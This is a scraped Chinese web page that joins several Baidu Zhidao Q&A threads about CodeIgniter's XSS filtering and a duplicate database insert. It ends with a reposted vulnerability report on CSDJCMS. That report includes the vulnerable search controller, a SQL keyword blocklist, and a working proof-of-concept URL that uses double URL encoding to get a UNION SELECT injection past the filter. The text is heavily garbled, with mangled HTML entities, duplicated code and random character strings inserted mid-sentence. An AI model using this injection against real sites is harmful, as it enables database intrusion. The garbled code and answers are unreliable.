$this->input->post(“”,trueman)和$this->input->xss_clean($this->input->post(“”)),

$this-&input-&post(“”,true)和$this-&input-&xss_clean($this-&input-&post(“”)),_百度知道
$this-&input-&post(“”,true)和$this-&input-&xss_clean($this-&input-&post(“”)),
我看手册中写着 xss_clean()可以过滤跨站脚本,而$this-&input-&post(“”,true) 第二个参数设置true也可以,而看有的好象写的$this-&input-&xss_clean($this-&input-&post(“”)),请问两个效果是一样的吗?还有用$this-&input-&post(“”,true) 设置tru卓坪第疚郢狡电挟钉锚e 的时候要先加载或者配置xss吗?
提问者采纳
这是CI 里的吧
虽然接触CI 不多 但个人感觉$this-&胀饺侈咳侬纠畴穴川膜input-&post(&&,true) 好点 。之前有用过xss_clean 这个 直接 Post 都无法提交了 直接失败 。貌似是那里需要配置怎么的 接触不多 可在官 方手册 下查下
提问者评价
来自:求助得到的回答
其他类似问题
xss的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁$this-&input-&post(“”,true) 和$this-&input-&xss_clean($this-&input-&post(“”))区别_百度知道
$this-&input-&post(“”,true) 和$this-&input-&xss_clean($this-&input-&post(“”))区别
我看手册中写着 xss_clean()可以过滤跨站脚本,而$this-&input-&post(“”,true) 第二个参数设置true也可以,而看有的好象写的$this-&input-&xss_clean($this-&input-&post(“”)),请问两个效果是一样的吗?还有用$this-&input-&post(“”,true) 设置true 的时候要先加载或者配置xss吗?
我有更好的答案
按默认排序
dddbsddbuiebdiuwedbuiwebdiuwebfuiwebfiuwebfuiwebfiuwebf
看上去 太鸡巴 难了哦
这个看上去好难哦
其他类似问题
xss的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁==请教各位,xss_clean把提交内容的&script...转换得面目全非==_百度知道
==请教各位,xss_clean把提交内容的&script...转换得面目全非==
scrip饨饺垛咳艹纠蝴艘t.,直接成了[removed]script.实际还是需要正常显示这些字符的。以往不用CI时;post($var., TRUE))把提交内容的&ltxss_clean(或$this-&gt,不知各位都是怎么处理的;input-&gt.,比如..转换得面目全非,现在用CI似乎反而麻烦了.,都是直接htmlspecialchars处理
post() 其实就是去掉灼穿滇堆鄄瞪国论了跨站脚本过滤功能直接用$this-&input-&gt。手册上有说明post的第二个参数,把第二个参数设为TRUE。第二个参数是可选的,如果想让取得的数据经过跨站脚本过滤(XSS Filtering)
其他类似问题
面目全非的相关知识
按默认排序
其他2条回答
册“表单验证”里面 提琴冠灌恍弑喝靳勤到一个过滤函数 prep_for_formprep_for_form,可能对你有用吧,可以讲特殊字符转换成实体
数据序列化后再提交,jquery中有相关的函数,可以直接用的,你是用的jquery吗?
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁本来要往数据库插一条数据,结果数据库中插入了两条_百度知道
本来要往数据库插一条数据,结果数据库中插入了两条
一条是理想数据mysql中本来要往数据库插一条数据。可是不知道问题具体荭观边谎装荷跌芹出在哪里,是数据库设计的问题吗?请大家帮帮忙,结果数据库中插入了两条,另一条是值全为0的烂数据,然后在插入时进行了空值过滤就不会了
insert(' =&content'input-& time();
} CI_Controller中的insert方法;CI_Model的insert方法(input-& =&gt:名字是M_message);执行添加留言操作
case &post('name' =&gt: function insert() {
$data = array(
';insert_id();posttime'no&insert()&content&#39,
'message'M_message-&);;;
return $this-&0){
echo &quot,
);name'/ $this-&gt:function in荼唷编荷妆沽爹朴sert($type) {
switch($type) {
echo & $this-&db-&gt, $data);yes&message&);
}post('
$this-&gt: if($this-&gt
提问者采纳
问您是怎么插入的,直接吨掸草废禺肚饿觅用insert插入的,什么方式,还是通过程序插入的?如果是程序的话,用的什么程序
提问者评价
其他类似问题
按默认排序
其他2条回答
该是程序问题,但是值变量都被清空了,某个地方的插入语句
数据库的设计一般不会出现这问题,还是程序的问题,建议debug一下。
数据库的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁CSDJCMS 程式舞曲 最新版 Sql 一枚 (test demo success). &
CSDJCMS 程式舞曲 最新版 Sql 一枚 (test demo success).
CSDJCMS 程式舞曲 最新版 Sql 一枚 (test demo success).
漏洞作者:
发现过滤了zj.php中的key
但是app/controllers/dance.php中 没过滤。
[crayon-546af50d9d ]&code&public function so()
$data='';$data_content='';
$fid = $this-&security-&xss_clean($this-&uri-&segment(3));
$key = $this-&security-&xss_clean($this-&input-&get_post('key', TRUE));
= intval($this-&input-&get('p', TRUE));
if($page==0) $page=1;
$key=$this-&CsdjSkins-&rurlencode($key);
if($fid=='zm' && empty($key)){
$key=$this-&security-&xss_clean($this-&uri-&segment(4));
$cache_id ="dance_so_".$fid."_".$key."_".$
12345678910111213
[crayon-546af50d9d ]&code&public function so() {&&&&&&&&&&&&$data='';$data_content='';&&&&&&&&&&&&$fid = $this->security->xss_clean($this->uri->segment(3));&& //方式&&&&&&&&&&&&$key = $this->security->xss_clean($this->input->get_post('key', TRUE));&& //关键字&&&&&&&&&&&&$page&&= intval($this->input->get('p', TRUE));&& //页数&&&&&&&&&&&&if($page==0) $page=1;&&&&&&&&&&&&$key=$this->CsdjSkins->rurlencode($key);&&&&&&&&&&&&if($fid=='zm' && empty($key)){&&&&&&&&&&&&&&&& $key=$this->security->xss_clean($this->uri->segment(4)); &&&&&&&&&&&&}& &&&&$cache_id ="dance_so_".$fid."_".$key."_".$page;
[crayon-546af50d9d5a ]&code&function rurlencode($string) {
$key=rawurldecode($string);
if($this-&is_utf8($key)){
$key=iconv('UTF-8', 'GB2312', $key);
[crayon-546af50d9d5a ]&code&function rurlencode($string) {&&&&&&&&&&&&&& $key=rawurldecode($string);&&&&&&&&&&&&&& if($this->is_utf8($key)){&&&&&&&&&&&&&&&&&&&&$key=iconv('UTF-8', 'GB2312', $key);&&&&&&&&&&&&&& }&&&&&&&&&&&& return $key;&&&&&&&& }
解码一个。
[crayon-546af50d9d5be ]&code&function Safe($arr){
$getfilter = "'|&[^&]*?&|^\\+\/v(8|9)|\\b(and|or)\\b.+?(&|&|=|\\bin\\b|\\blike\\b)|\\/\\*.+?\\*\\/|&\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";
$postfilter = "^\\+\/v(8|9)|\\b(and|or)\\b.{1,6}?(=|&|&|\\bin\\b|\\blike\\b)|\\/\\*.+?\\*\\/|&\\s*script\\b|&\\s*img\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";
if (preg_match ( "/" . $getfilter . "/is", $arr ) == 1) { //GET
if (preg_match ( "/" . $postfilter . "/is", $arr ) == 1) { //POST
return $this-&chkSql($arr);
function chkSql($str,$flag=false){
$checkStr="&|&|%|%27|'|''|;|*|onfocusin|autofocus|and|exec|dbcc|alter|drop|insert|select|update|delete|count|master|truncate|char|declare|where|set|declare|mid|chr";
if (empty($str)){ return ""; }
$arr=explode("|",$checkStr);
for ($i=0;$i&count($arr);$i++){
if (strpos(strtolower($str),$arr[$i]) &0){
if ($flag==false){
switch ($arr[$i]){
case "&":$re="&";
case "&":$re="&";
case "\"":$re="&";
case ";":$re="";
default:$re="";
$str=str_replace($arr[$i],$re,$str);
exit("???,а??");
1234567891011121314151617181920212223242526272829303132333435363738394041
[crayon-546af50d9d5be ]&code&function Safe($arr){
$getfilter = "'|&[^&]*?&|^\\+\/v(8|9)|\\b(and|or)\\b.+?(&|&|=|\\bin\\b|\\blike\\b)|\\/\\*.+?\\*\\/|&\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";
$postfilter = "^\\+\/v(8|9)|\\b(and|or)\\b.{1,6}?(=|&|&|\\bin\\b|\\blike\\b)|\\/\\*.+?\\*\\/|&\\s*script\\b|&\\s*img\\b|\\bEXEC\\b|UNION.+?SELECT|UPDATE.+?SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE).+?FROM|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";&
if (preg_match ( "/" . $getfilter . "/is", $arr ) == 1) { //GET
if (preg_match ( "/" . $postfilter . "/is", $arr ) == 1) { //POST
}&&&&&&&&&&&&&&&&
return $this->chkSql($arr); }& function chkSql($str,$flag=false){&
$checkStr="&|&|%|%27|'|''|;|*|onfocusin|autofocus|and|exec|dbcc|alter|drop|insert|select|update|delete|count|master|truncate|char|declare|where|set|declare|mid|chr";
if (empty($str)){ return ""; }
$arr=explode("|",$checkStr);
for ($i=0;$i<count($arr);$i++){
if (strpos(strtolower($str),$arr[$i]) >0){
if ($flag==false){
switch ($arr[$i]){
case "&":$re="&";break;
case "&":$re="&";break;
case "\"":$re="&";break;
case ";":$re="";break;
default:$re="";break;
$str=str_replace($arr[$i],$re,$str);
exit("???,а??");
return $str;
这里过滤。
编码绕过。
漏洞证明:
/index.php/dance/so/key/?key=%252527) %25%36%31%25%36%45%25%36%34 1=2 union %25%37%33%25%36%35%25%36%43%25%36%35%25%36%33%25%37%34 user(),user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 %23
http:///index.php/dance/so/key/?key=%252527) %25%36%31%25%36%45%25%36%34 1=2 union %25%37%33%25%36%35%25%36%43%25%36%35%25%36%33%25%37%34 user(),user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 %23
------====== 本站公告 ======------
本站的文章都大多源自网络.并不是都是原创。如果没有著名出处。可能是转载文章的时候没有写或者是文章本身就是转载的就没在写出处。本站定位就是分享资源。如果有版权问题,请联系本站删除或者更改!!!需要交换链接的朋友请到留言~~}

我要回帖

更多关于 trueman 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信